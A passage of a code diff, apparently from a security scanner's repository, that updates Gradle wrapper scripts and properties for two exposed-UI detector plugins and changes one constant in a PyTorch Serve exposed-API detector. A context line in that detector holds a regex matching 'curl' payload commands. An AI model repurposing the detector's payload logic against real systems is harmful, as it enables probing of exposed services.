%JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/pytorch_serve/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/pytorch_serve/gradlew b/google/detectors/exposedui/pytorch_serve/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/pytorch_serve/gradlew +++ b/google/detectors/exposedui/pytorch_serve/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/pytorch_serve/gradlew.bat b/google/detectors/exposedui/pytorch_serve/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/pytorch_serve/gradlew.bat +++ b/google/detectors/exposedui/pytorch_serve/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java b/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java index 491cc18a3..ebb414e62 100644 --- a/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java +++ b/google/detectors/exposedui/pytorch_serve/src/main/java/com/google/tsunami/plugins/detectors/exposedui/pytorchserve/PytorchServeExposedApiDetector.java @@ -67,7 +67,7 @@ public final class PytorchServeExposedApiDetector implements VulnDetector { private final Clock utcClock; private final HttpClient httpClient; private final PayloadGenerator payloadGenerator; - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "PYTORCH_EXPOSED_UI"; private static final Pattern URI_REGEX = Pattern.compile("curl (.*)"); diff --git a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/spring/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/spring/gradlew b/google/detectors/exposedui/spring/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/spring/gradlew +++ b/google/detectors/exposedui/spring/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) 